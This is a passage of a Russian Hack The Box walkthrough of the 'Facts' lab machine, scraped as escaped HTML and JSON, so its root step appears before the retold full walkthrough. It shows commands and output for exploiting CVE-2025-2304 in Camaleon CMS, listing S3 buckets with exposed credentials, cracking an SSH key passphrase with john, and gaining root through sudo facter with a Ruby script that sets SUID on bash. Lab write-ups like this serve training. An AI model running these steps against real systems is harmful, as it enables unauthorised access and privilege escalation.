\u0421\u043e\u0437\u0434\u0430\u0434\u0438\u043c \u0432\u0440\u0435\u043c\u0435\u043d\u043d\u0443\u044e \u0434\u0438\u0440\u0435\u043a\u0442\u043e\u0440\u0438\u044e \u0438 \u043d\u0430\u043f\u0438\u0448\u0435\u043c \u0442\u0443\u0434\u0430 \u043f\u0440\u043e\u0441\u0442\u0435\u0439\u0448\u0438\u0439 Ruby-\u0441\u043a\u0440\u0438\u043f\u0442, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0432\u044b\u0434\u0430\u0441\u0442 \u0443\u0442\u0438\u043b\u0438\u0442\u0435 \/bin\/bash \u043f\u0440\u0430\u0432\u0430 SUID.<\/p>\n
mkdir -p \/tmp\/1echo 'system(\"\/bin\/chmod u+s \/bin\/bash\")' > \/tmp\/privesc\/1.rb<\/code>
<\/a><\/div><\/pre>\n
\u0422\u0435\u043f\u0435\u0440\u044c \u0437\u0430\u043f\u0443\u0441\u0442\u0438\u043c \u0443\u0442\u0438\u043b\u0438\u0442\u0443 \u043e\u0442 \u0438\u043c\u0435\u043d\u0438 \u0441\u0443\u043f\u0435\u0440\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f \u0438 \u0441\u043a\u043e\u0440\u043c\u0438\u043c \u0435\u0439 \u043d\u0430\u0448\u0443 \u043f\u0430\u043f\u043a\u0443 \u0441 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u043c \u0444\u0430\u043a\u0442\u043e\u043c:<\/p>\n
sudo \/usr\/bin\/facter --custom-dir \/tmp\/1<\/code>
<\/a><\/div><\/pre>\n
\u0415\u0441\u043b\u0438 \u0441\u043a\u0440\u0438\u043f\u0442 \u043e\u0442\u0440\u0430\u0431\u043e\u0442\u0430\u043b, \u0443 \/bin\/bash \u0442\u0435\u043f\u0435\u0440\u044c \u0435\u0441\u0442\u044c \u0431\u0438\u0442 SUID \u043e\u0442 \u0440\u0443\u0442\u0430. \u0417\u0430\u043f\u0443\u0441\u043a\u0430\u0439 \u0431\u0430\u0448 \u0441 \u0441\u043e\u0445\u0440\u0430\u043d\u0435\u043d\u0438\u0435\u043c \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0439 (\u0444\u043b\u0430\u0433 -p):<\/p>\n
\/bin\/bash -p<\/code>
<\/a><\/div><\/pre>\n
\u041f\u0440\u043e\u0432\u0435\u0440\u0438\u043c  \u043a\u043e\u043c\u0430\u043d\u0434\u043e\u0439 id (\u0434\u043e\u043b\u0436\u0435\u043d \u0431\u044b\u0442\u044c euid=0(root))<\/p>\n
trivia@facts:\/opt\/factsapp$ \/bin\/bash -pbash-5.2# iduid=1000(trivia) gid=1000(trivia) euid=0(root) groups=1000(trivia)<\/code>
<\/a><\/div><\/pre>\n
bash-5.2# cat root.txt rootflag<\/code>
<\/a><\/div><\/pre>\n
\u0420\u0430\u0439\u0442\u0430\u043f \u043f\u043e\u0434\u0433\u043e\u0442\u043e\u0432\u0438\u043b <\/em>@alfabuster<\/em><\/a><\/p>\n<\/div>\n
\u0441\u0441\u044b\u043b\u043a\u0430 \u043d\u0430 \u043e\u0440\u0438\u0433\u0438\u043d\u0430\u043b \u0441\u0442\u0430\u0442\u044c\u0438 https:\/\/habr.com\/ru\/articles\/1053654\/<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"
\u0424\u0430\u043a\u0442\u044b \u041f\u0440\u043e\u0441\u0442\u0430\u044f \u043c\u0430\u0448\u0438\u043d\u0430 \u043e\u0442 Hack The Box, \u043d\u0430 \u043a\u043e\u0442\u043e\u0440\u043e\u0439 \u0440\u0430\u0431\u043e\u0442\u0430\u0435\u0442 Camaleon CMS 2.9.0 \u043f\u043e\u0434 \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435\u043c nginx. \u0412 \u0441\u0438\u0441\u0442\u0435\u043c\u0435 \u0432\u043a\u043b\u044e\u0447\u0435\u043d\u0430 \u0444\u0443\u043d\u043a\u0446\u0438\u044f \u0441\u0430\u043c\u043e\u0441\u0442\u043e\u044f\u0442\u0435\u043b\u044c\u043d\u043e\u0439 \u0440\u0435\u0433\u0438\u0441\u0442\u0440\u0430\u0446\u0438\u0438, \u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0430\u044f \u043f\u043e\u0432\u044b\u0441\u0438\u0442\u044c \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0438 \u043f\u043e\u0441\u043b\u0435 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438 (CVE-2025-2304), \u0434\u0430\u0435\u0442 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u044c \u043b\u044e\u0431\u043e\u043c\u0443 \u0437\u0430\u0440\u0435\u0433\u0438\u0441\u0442\u0440\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u043c\u0443 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044e \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u043f\u0440\u0430\u0432\u0430 \u0430\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440\u0430 CMS \u0432\u0441\u0435\u0433\u043e \u0437\u0430 \u043e\u0434\u0438\u043d \u0437\u0430\u043f\u0440\u043e\u0441. \u0412 \u043d\u0430\u0441\u0442\u0440\u043e\u0439\u043a\u0430\u0445 \u0445\u0440\u0430\u043d\u0438\u043b\u0438\u0449\u0430 \u043c\u0435\u0434\u0438\u0430\u0444\u0430\u0439\u043b\u043e\u0432 \u0432 \u043f\u0430\u043d\u0435\u043b\u0438 \u0430\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440\u0430 \u043c\u043e\u0436\u043d\u043e \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u0442\u044c \u0443\u0447\u0435\u0442\u043d\u044b\u0435 \u0434\u0430\u043d\u043d\u044b\u0435 \u0434\u043b\u044f AWS S3. \u041f\u0435\u0440\u0435\u0431\u043e\u0440 (\u043f\u0435\u0440\u0435\u0447\u0438\u0441\u043b\u0435\u043d\u0438\u0435) \u0431\u0430\u043a\u0435\u0442\u043e\u0432 S3 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043d\u0430\u0439\u0442\u0438 \u0432\u043d\u0443\u0442\u0440\u0435\u043d\u043d\u0438\u0439 \u0431\u0430\u043a\u0435\u0442, \u0441\u043e\u0434\u0435\u0440\u0436\u0430\u0449\u0438\u0439 \u0437\u0430\u043a\u0440\u044b\u0442\u044b\u0439 SSH-\u043a\u043b\u044e\u0447, \u0437\u0430\u0449\u0438\u0449\u0435\u043d\u043d\u044b\u0439 \u043f\u0430\u0440\u043e\u043b\u044c\u043d\u043e\u0439 \u0444\u0440\u0430\u0437\u043e\u0439, \u043a\u043e\u0442\u043e\u0440\u0443\u044e \u043c\u043e\u0436\u043d\u043e \u043f\u043e\u0434\u043e\u0431\u0440\u0430\u0442\u044c. \u0412 \u043a\u043e\u043c\u043c\u0435\u043d\u0442\u0430\u0440\u0438\u0438 \u043a \u043a\u043b\u044e\u0447\u0443 \u0443\u043a\u0430\u0437\u0430\u043d\u043e \u0438\u043c\u044f \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f (trivia), \u0447\u0442\u043e \u043e\u0442\u043a\u0440\u044b\u0432\u0430\u0435\u0442 \u0434\u043e\u0441\u0442\u0443\u043f \u043f\u043e SSH \u0438 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c\u0441\u043a\u0438\u0439 \u0444\u043b\u0430\u0433. \u041f\u043e\u0432\u044b\u0448\u0435\u043d\u0438\u0435 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0439 \u043e\u0441\u0443\u0449\u0435\u0441\u0442\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u0437\u0430 \u0441\u0447\u0435\u0442 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u044f \u043f\u0440\u0430\u0432\u0438\u043b\u0430 sudo, \u043d\u0435 \u0442\u0440\u0435\u0431\u0443\u044e\u0449\u0435\u0433\u043e \u043f\u0430\u0440\u043e\u043b\u044f, \u0434\u043b\u044f \u0443\u0442\u0438\u043b\u0438\u0442\u044b \/usr\/bin\/facter: \u0444\u043b\u0430\u0433 —custom-dir \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0437\u0430\u0433\u0440\u0443\u0436\u0430\u0442\u044c \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u044b\u0435 \u0441\u043a\u0440\u0438\u043f\u0442\u044b Ruby \u0441 \u043f\u0440\u0430\u0432\u0430\u043c\u0438 root, \u043e\u0431\u0435\u0441\u043f\u0435\u0447\u0438\u0432\u0430\u044f \u043f\u0440\u043e\u0441\u0442\u043e\u0439 \u043f\u0443\u0442\u044c \u043a \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u044e SUID-\u043e\u0431\u043e\u043b\u043e\u0447\u043a\u0438 bash \u0438 root-\u0444\u043b\u0430\u0433\u0430.1. Recon (\u0420\u0430\u0437\u0432\u0435\u0434\u043a\u0430)\u0421\u043c\u043e\u0442\u0440\u0438\u043c \u0438\u0441\u0445\u043e\u0434\u043d\u044b\u0439 \u043a\u043e\u0434 \u0438 \u0441\u043a\u0430\u043d\u0438\u0440\u0443\u0435\u043c \u043f\u043e\u0440\u0442\u044b:PORT   STATE SERVICE VERSION22\/tcp open  ssh     OpenSSH 9.9p1 Ubuntu 3ubuntu3.2 (Ubuntu Linux; protocol 2.0)| ssh-hostkey: |   256 4d:d7:b2:8c:d4:df:57:9c:a4:2f:df:c6:e3:01:29:89 (ECDSA)|_  256 a3:ad:6b:2f:4a:bf:6f:48:ac:81:b9:45:3f:de:fb:87 (ED25519)80\/tcp open  http    nginx 1.26.3 (Ubuntu)|_http-server-header: nginx\/1.26.3 (Ubuntu)| http-methods: |_  Supported Methods: GET HEAD POST OPTIONS|_http-title: Did not follow redirect to http:\/\/facts.htb\/Service Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel\u041f\u043e \u0441\u0442\u0430\u043d\u0434\u0430\u0440\u0442\u0443 22 \u0438 80 \u043f\u043e\u0440\u0442 \u0412\u0438\u0434\u043d\u043e, \u0447\u0442\u043e \u043d\u0430 80 \u043f\u043e\u0440\u0442\u0443 \u0435\u0441\u0442\u044c \u043d\u0435\u043a\u0438\u0439 \u0441\u0430\u0439\u0442, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0440\u0435\u0434\u0438\u0440\u0435\u043a\u0442\u0438\u0442 \u043d\u0430 \u0434\u043e\u043c\u0435\u043d facts.htb.\u0414\u043e\u0431\u0430\u0432\u043b\u044f\u0435\u043c \u0435\u0433\u043e \u0432 \/etc\/hosts c ip \u0430\u0434\u0440\u0435\u0441\u043e\u043c 10.10.15.138 \u0432 \u043c\u043e\u0435\u043c \u0441\u043b\u0443\u0447\u0430\u0435. \u041f\u0435\u0440\u0435\u0439\u0434\u044f \u043d\u0430 \u0441\u0430\u0439\u0442, \u0432\u0438\u0434\u0438\u043c \u0447\u0442\u043e \u044d\u0442\u043e \u0441\u0430\u0439\u0442 \u0441 \u043a\u0430\u0440\u0442\u0438\u043d\u043a\u0430\u0438\u043c \u0438 \u0444\u0430\u043a\u0442\u0430\u043c\u0438. \u041f\u043e\u0445\u043e\u0436\u0435 \u043d\u0430 \u043a\u0430\u043a\u0443\u044e-\u0442\u043e CMS, \u043d\u043e \u0438\u0437 \u0438\u0441\u0445\u043e\u0434\u043d\u043e\u0433\u043e \u043a\u043e\u0434\u0430 \u043f\u043e\u043a\u0430 \u043d\u0435\u043f\u043e\u043d\u044f\u0442\u043d\u043e, \u043a\u0430\u043a\u0430\u044f \u0438\u043c\u0435\u043d\u043d\u043e.2. \u0424\u0430\u0437\u0437\u0438\u043d\u0433\u041f\u043e\u0441\u043a\u043e\u043b\u044c\u043a\u0443 \u0435\u0441\u0442\u044c \u043f\u0440\u0435\u0434\u043f\u043e\u043b\u043e\u0436\u0435\u043d\u0438\u0435, \u0447\u0442\u043e \u044d\u0442\u043e CMS, \u0442\u043e \u0434\u043e\u043b\u0436\u043d\u0430 \u0431\u044b\u0442\u044c \u0430\u0434\u043c\u0438\u043d\u043a\u0430.\u041f\u0440\u0438\u0441\u0442\u0443\u043f\u0430\u0435\u043c \u043a \u0444\u0430\u0437\u0437\u0438\u043d\u0433\u0443. \u041d\u0430\u0443\u0447\u0435\u043d\u043d\u044b\u0439 \u043f\u0440\u0435\u0434\u044b\u0434\u0443\u0449\u0438\u043c \u043e\u043f\u044b\u0442\u043e\u043c CTF, \u0433\u0434\u0435 \u044f \u0431\u0440\u0430\u043b \u043c\u0430\u043b\u0435\u043d\u044c\u043a\u0438\u0435 \u0441\u043b\u043e\u0432\u0430\u0440\u0438 \u0438 \u043d\u0438\u0447\u0435\u0433\u043e \u043d\u0435 \u043d\u0430\u0445\u043e\u0434\u0438\u043b, \u0432 \u044d\u0442\u043e\u0442 \u0440\u0430\u0437 \u044f \u0441\u0440\u0430\u0437\u0443 \u0431\u0435\u0440\u0443 \u0431\u043e\u043b\u044c\u0448\u043e\u0439 \u0441\u043b\u043e\u0432\u0430\u0440\u044c\u2026ffuf -w \/usr\/share\/seclists\/Discovery\/Web-Content\/DirBuster-2007_directory-list-2.3-big.txt  -u «http:\/\/facts.htb\/FUZZ»  -ic -c        \/’___\\  \/’___\\           \/’___\\              \/\\ \\__\/ \/\\ \\__\/  __  __  \/\\ \\__\/              \\ \\ ,__\\\\ \\ ,__\\\/\\ \\\/\\ \\ \\ \\ ,__\\              \\ \\ \\_\/ \\ \\ \\_\/\\ \\ \\_\\ \\ \\ \\ \\_\/               \\ \\_\\   \\ \\_\\  \\ \\____\/  \\ \\_\\                 \\\/_\/    \\\/_\/   \\\/___\/    \\\/_\/              v2.1.0-dev________________________________________________ :: Method           : GET :: URL              : http:\/\/facts.htb\/FUZZ :: Wordlist         : FUZZ: \/usr\/share\/seclists\/Discovery\/Web-Content\/DirBuster-2007_directory-list-2.3-big.txt :: Follow redirects : false :: Calibration      : false :: Timeout          : 10 :: Threads          : 40 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500________________________________________________rss                     [Status: 200, Size: 183, Words: 20, Lines: 9, Duration: 1060ms]sitemap                 [Status: 200, Size: 3508, Words: 424, Lines: 130, Duration: 1032ms]index                   [Status: 200, Size: 11113, Words: 1328, Lines: 125, Duration: 1138ms]                        [Status: 200, Size: 11098, Words: 1328, Lines: 125, Duration: 1146ms]search                  [Status: 200, Size: 19187, Words: 3276, Lines: 272, Duration: 1794ms]en                      [Status: 200, Size: 11109, Words: 1328, Lines: 125, Duration: 1555ms]page                    [Status: 200, Size: 19593, Words: 3296, Lines: 282, Duration: 1576ms]welcome                 [Status: 200, Size: 11966, Words: 1481, Lines: 130, Duration: 1354ms]admin                   [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 1323ms]post                    [Status: 200, Size: 11308, Words: 1414, Lines: 152, Duration: 1702ms]ajax                    [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 1336ms]Index                   [Status: 200, Size: 11113, Words: 1328, Lines: 125, Duration: 1319ms]up                      [Status: 200, Size: 73, Words: 4, Lines: 1, Duration: 1667ms]-                       [Status: 200, Size: 11098, Words: 1328, Lines: 125, Duration: 1711ms]404                     [Status: 200, Size: 4836, Words: 832, Lines: 115, Duration: 1879ms]\u0414\u0430. \u0415\u0441\u0442\u044c \u0443 \u043d\u0430\u0441 \u043c\u043d\u043e\u0433\u043e \u043a\u0430\u0442\u0430\u043b\u043e\u0433\u043e\u0432, \u043d\u043e \u044f \u043f\u043e\u0439\u0434\u0443 \u0432 \u0430\u0434\u043c\u0438\u043d\u043a\u0443\u2026 alt text\u0415\u0441\u0442\u0435\u0441\u0442\u0432\u0435\u043d\u043d\u043e \u043d\u0438 \u0438\u043c\u0435\u043d\u0438 \u043d\u0438 \u043f\u0430\u0440\u043e\u043b\u044f \u043c\u044b \u043d\u0435 \u0437\u043d\u0430\u0435\u043c, \u043e\u0434\u043d\u0430\u043a\u043e \u043c\u044b \u043c\u043e\u0436\u0435\u043c \u0441\u043e\u0437\u0434\u0430\u0442\u044c \u043d\u043e\u0432\u044b\u0439 \u0430\u043a\u043a\u0430\u0443\u043d\u0442. \u041f\u043e\u0441\u043b\u0435 \u0440\u0435\u0433\u0438\u0441\u0442\u0440\u0430\u0446\u0438\u0438 \u0438 \u0432\u0445\u043e\u0434\u0430 \u0432 \u0430\u0434\u043c\u0438\u043d \u043f\u0430\u043d\u0435\u043b\u044c, \u043c\u044b \u043d\u0430\u043a\u043e\u043d\u0435\u0446 \u0443\u0437\u043d\u0430\u0435\u043c, \u0447\u0442\u043e \u044d\u0442\u043e Camaleon CMS \u0432\u0435\u0440\u0441\u0438\u0438 2.9.0.\u041f\u043e\u0432\u044b\u0448\u0435\u043d\u0438\u0435 \u043f\u0440\u0438\u0432\u0435\u043b\u0435\u0433\u0438\u0439 \u0434\u043e \u0430\u0434\u043c\u0438\u043d\u0430 \u0432 CMS\u041f\u0435\u0440\u0432\u043e\u0435, \u0447\u0442\u043e \u044f \u0441\u0434\u0435\u043b\u0430\u043b, \u044d\u0442\u043e \u043f\u043e\u0448\u0435\u043b \u0432 \u0433\u0443\u0433\u043b \u0438\u0441\u043a\u0430\u0442\u044c \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043d\u0430 \u044d\u0442\u0443 \u0432\u0435\u0440\u0441\u0438\u044e. \u041d\u0430 \u0433\u0438\u0442\u0445\u0430\u0431\u0435 \u0435\u0441\u0442\u044c CVE \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0430\u044f \u0438\u0437 \u043e\u0431\u044b\u0447\u043d\u043e\u0433\u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f \u043f\u043e\u0432\u044b\u0441\u0438\u0442\u044c \u043f\u0440\u0438\u0432\u0435\u043b\u0435\u0433\u0438\u0438 \u0434\u043e \u0430\u0434\u043c\u0438\u043d\u0430\u2026 CVE \u043d\u0430 \u0433\u0438\u0442\u0445\u0430\u0431\u0435python exploit.py -u http:\/\/facts.htb -U test -P test[+]Camaleon CMS Version 2.9.0 PRIVILEGE ESCALATION (Authenticated)[+]Login confirmed   User ID: 5   Current User Role: client[+]Loading PPRIVILEGE ESCALATION   User ID: 5   Updated User Role: admin[+]Reverting User Role\u0412\u043e\u0442 \u0442\u0430\u043a \u043e\u0434\u043d\u043e\u0439 \u043a\u043e\u043c\u0430\u043d\u0434\u043e\u0439 \u0441\u0442\u0430\u043d\u043e\u0432\u0438\u043c\u0441\u044f \u0430\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440\u043e\u043c \u043d\u0430 \u044d\u0442\u043e\u043c \u0441\u0430\u0439\u0442\u0435 \u0438 \u043f\u043e\u043b\u0443\u0447\u0430\u0435\u043c \u043f\u0440\u0430\u043a\u0442\u0438\u0447\u0435\u0441\u043a\u0438 \u043f\u043e\u043b\u043d\u044b\u0439 \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u044c, \u043d\u0430\u0434 \u0441\u0430\u0439\u0442\u043e\u043c. alt text\u0412\u0435\u043a\u0442\u043e\u0440\u0430 \u0434\u043b\u044f \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u044f \u0444\u043b\u0430\u0433\u043e\u0432\u041f\u0440\u043e\u043a\u0438\u043d\u0443\u0442\u044c \u0440\u0435\u0432\u0435\u0440\u0441-\u0448\u0435\u043b\u043b, \u044f \u043d\u0435 \u0441\u043c\u043e\u0433 \u0438 \u0441\u0442\u0430\u043b \u0438\u0441\u043a\u0430\u0442\u044c \u0434\u0440\u0443\u0433\u0438\u0435 \u043f\u0443\u0442\u0438. \u0412 \u043d\u0430\u0441\u0442\u0440\u043e\u0439\u043a\u0430\u0445 \u0441\u0430\u0439\u0442\u0430, \u044f \u043d\u0430\u0448\u0435\u043b \u0442\u0430\u043a\u043e\u0439 \u043f\u0443\u043d\u043a\u0442 alt text\u0412\u0438\u0434\u043d\u043e, \u0447\u0442\u043e \u0443 \u043d\u0430\u0441 \u0435\u0441\u0442\u044c \u043e\u0431\u043b\u0430\u0447\u043d\u043e\u0435 \u0445\u0440\u0430\u043d\u0438\u043b\u0438\u0449\u0435 \u043e\u0442 \u0430\u043c\u0430\u0437\u043e\u043d\u0430 \u0438 \u043a\u0440\u0435\u0434\u044b \u043e\u0442 \u043d\u0435\u0433\u043e. \u041d\u0443\u0436\u043d\u043e \u0437\u0430\u0439\u0442\u0438 \u0432 \u043d\u0435\u0433\u043e \u0438 \u043f\u043e\u0441\u043c\u043e\u0442\u0440\u0435\u0442\u044c, \u0432\u0434\u0440\u0443\u0433 \u0435\u0441\u0442\u044c, \u0447\u0442\u043e \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u043e\u0435. \u0414\u043b\u044f \u044d\u0442\u0438\u0445 \u0446\u0435\u043b\u0435\u0439 \u0431\u0443\u0434\u0435\u043c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u0443\u0442\u0438\u043b\u0438\u0442\u0443 AWS. \u042f \u044d\u0442\u043e\u0439 \u0443\u0442\u0438\u043b\u0438\u0442\u043e\u0439 \u043d\u0438 \u0440\u0430\u0437\u0443 \u043d\u0435 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0441\u044f \u043f\u043e\u044d\u0442\u043e\u043c\u0443 \u0432\u043e\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0441\u044f \u0433\u0430\u0439\u0434\u043e\u043c \u043d\u0430 \u041c\u0435\u0434\u0438\u0443\u043c\u0435aws —endpoint-url http:\/\/10.129.10.56:54321 s3 ls s3:\/\/randomfacts —recursive\u0417\u0434\u0435\u0441\u044c \u043e\u0434\u043d\u0438 \u043a\u0430\u0440\u0442\u0438\u043d\u043a\u0438 \u0438 \u043d\u0438\u0447\u0435\u0433\u043e \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u043e\u0433\u043e \u043d\u0435\u0442.\u041e\u0434\u043d\u0430\u043a\u043e \u0435\u0441\u043b\u0438 \u0432\u043e\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c\u0441\u044f \u043a\u043e\u043c\u0430\u043d\u0434\u043e\u0439:aws —endpoint-url http:\/\/10.129.10.56:54321 s3 ls 2025-09-11 08:06:52 internal2025-09-11 08:06:52 randomfacts\u0422\u043e \u043c\u043e\u0436\u043d\u043e \u0443\u0432\u0438\u0434\u0435\u0442\u044c, \u0447\u0442\u043e \u043a\u0440\u043e\u043c\u0435 randomfacts \u0431\u0430\u043a\u0435\u0442\u0430 \u0435\u0441\u0442\u044c \u0435\u0449\u0435 \u0438 internal. \u0418 \u0437\u0434\u0435\u0441\u044c \u0435\u0441\u0442\u044c \u043f\u0440\u0438\u0432\u0430\u0442\u043d\u044b\u0439 \u043a\u043b\u044e\u0447 ssh….2026-01-08 14:01:43          0 .cache\/motd.legal-displayed2026-01-08 13:47:17         20 .lesshst2026-01-08 13:47:17        807 .profile2026-03-04 03:17:40         82 .ssh\/authorized_keys2026-03-04 03:17:40        464 .ssh\/id_ed25519\u0418\u043c\u044f \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f \u043d\u0435\u0438\u0437\u0432\u0435\u0441\u0442\u043d\u043e, \u0430 \u043e\u0442 \u0440\u0443\u0442\u0430, \u044d\u0442\u043e\u0442 \u043a\u043b\u044e\u0447 \u043d\u0435 \u043f\u043e\u0434\u0445\u043e\u0434\u0438\u0442, \u044d\u0442\u043e \u0431\u044b\u043b\u043e \u0431\u044b \u0441\u043b\u0438\u0448\u043a\u043e\u043c \u043f\u0440\u043e\u0441\u0442\u043e. \u041c\u043d\u043e\u0433\u043e \u0447\u0435\u0433\u043e \u043f\u0435\u0440\u0435\u043f\u0440\u043e\u0431\u043e\u0432\u0430\u043b \u0438\u0437 cms, \u043d\u043e \u043d\u0438\u0447\u0435\u0433\u043e \u043d\u0435 \u0441\u0440\u0430\u0431\u043e\u0442\u0430\u043b\u043e.\u041a \u0442\u043e\u043c\u0443 \u0436\u0435 \u043d\u0430 \u044d\u0442\u043e\u043c \u043a\u043b\u044e\u0447\u0435 \u0435\u0441\u0442\u044c \u043f\u0430\u0440\u043e\u043b\u044c\u043d\u0430\u044f \u0444\u0440\u0430\u0437\u0430:ssh2john id_ed25519 > id_ed25519_hash                                                                                                         \ue0b6 \uf306 \ue0b0\ue0b0 \ueb06 \ue0b1 Downloads \ue0b0\ue0b0 05:47 \ue0b0\ue0b0 0.097s \ue0b0 john id_ed25519_hash —wordlist=\/usr\/share\/wordlists\/rockyou.txt Using default input encoding: UTF-8Loaded 1 password hash (SSH, SSH private key [RSA\/DSA\/EC\/OPENSSH 32\/64])Cost 1 (KDF\/cipher [0=MD5\/AES 1=MD5\/3DES 2=Bcrypt\/AES]) is 2 for all loaded hashesCost 2 (iteration count) is 24 for all loaded hashesWill run 2 OpenMP threadsPress ‘q’ or Ctrl-C to abort, almost any other key for statusdragonballz      (id_ed25519)     1g 0:00:06:14 DONE (2026-03-04 05:54) 0.002672g\/s 8.552p\/s 8.552c\/s 8.552C\/s fireman..imissuUse the «—show» option to display all of the cracked passwords reliablySession completed. \u0423\u0431\u0438\u0440\u0430\u0435\u043c \u043f\u0430\u0440\u043e\u043b\u044c\u043d\u0443\u044e \u0444\u0440\u0430\u0437\u0443 \u0438 \u0437\u0434\u0435\u0441\u044c \u043d\u0430\u0445\u043e\u0434\u0438\u043c \u0438\u043c\u044f \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f:ssh-keygen -p -f id_ed25519Enter old passphrase: Key has comment ‘trivia@facts.htb’Enter new passphrase (empty for no passphrase): Enter same passphrase again: Your identification has been saved with the new passphrase.\u0422\u0435\u043f\u0435\u0440\u044c \u043c\u044b \u0432 \u0441\u0438\u0441\u0442\u0435\u043c\u0435 \u0438 \u043c\u043e\u0436\u0435\u043c \u043f\u0440\u043e\u0447\u0438\u0442\u0430\u0442\u044c \u044e\u0437\u0435\u0440\u0441\u043a\u0438\u0439 \u0444\u043b\u0430\u0433:trivia@facts:~$ lstrivia@facts:~$ ls -latotal 36drwxr-x— 6 trivia trivia 4096 Jan 28 16:17 .drwxr-xr-x 4 root   root   4096 Jan  8 17:53 ..lrwxrwxrwx 1 root   root      9 Jan 26 11:40 .bash_history -> \/dev\/null-rw-r—r— 1 trivia trivia  220 Aug 20  2024 .bash_logout-rw-r—r— 1 trivia trivia 3900 Jan  8 18:19 .bashrcdrwxrwxr-x 3 trivia trivia 4096 Jan  8 18:01 .bundledrwx—— 2 trivia trivia 4096 Jan  8 18:58 .cachedrwxrwxr-x 3 trivia trivia 4096 Jan  8 17:52 .local-rw-r—r— 1 trivia trivia  807 Aug 20  2024 .profiledrwx—— 2 trivia trivia 4096 Mar  4 08:17 .sshtrivia@facts:~$ cd \/hometrivia@facts:\/home$ lstrivia  williamtrivia@facts:\/home$ cd william\/trivia@facts:\/home\/william$ lsuser.txttrivia@facts:\/home\/william$ cat user.txt akfalksjfkajfslkasfjlkasjf\u041f\u043e\u0432\u044b\u0448\u0430\u0435\u043c \u043f\u0440\u0438\u0432\u0435\u043b\u0435\u0433\u0438\u0438 \u0434\u043e \u0440\u0443\u0442\u0430\u041f\u043e \u043a\u043b\u0430\u0441\u0441\u0438\u043a\u0435 \u043f\u0440\u043e\u0432\u0435\u0440\u044f\u0435\u043c sudo -l.trivia@facts:\/home\/william$ sudo -lMatching Defaults entries for trivia on facts:    env_reset, mail_badpass,    secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\\:\/snap\/bin, use_ptyUser trivia may run the following commands on facts:    (ALL) NOPASSWD: \/usr\/bin\/facter\u0418 \u0443 \u043d\u0430\u0441 \u0435\u0441\u0442\u044c \u0443\u0442\u0438\u043b\u0438\u0442\u0430 facter, \u043a\u043e\u0442\u043e\u0440\u0443\u044e \u043c\u043e\u0436\u0435\u043c \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0442\u044c \u0431\u0435\u0437 \u043f\u0430\u0440\u043e\u043b\u044f.\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0437\u0434\u0435\u0441\u044c \u043a\u0440\u043e\u0435\u0442\u0441\u044f \u0432 \u0442\u043e\u043c, \u0447\u0442\u043e \u0432 sudo -l \u043d\u0435 \u043f\u0440\u043e\u043f\u0438\u0441\u0430\u043d\u044b \u0436\u0435\u0441\u0442\u043a\u0438\u0435 \u0430\u0440\u0433\u0443\u043c\u0435\u043d\u0442\u044b. \u042d\u0442\u043e \u0437\u043d\u0430\u0447\u0438\u0442, \u0447\u0442\u043e \u043c\u044b \u043c\u043e\u0436\u0435\u043c 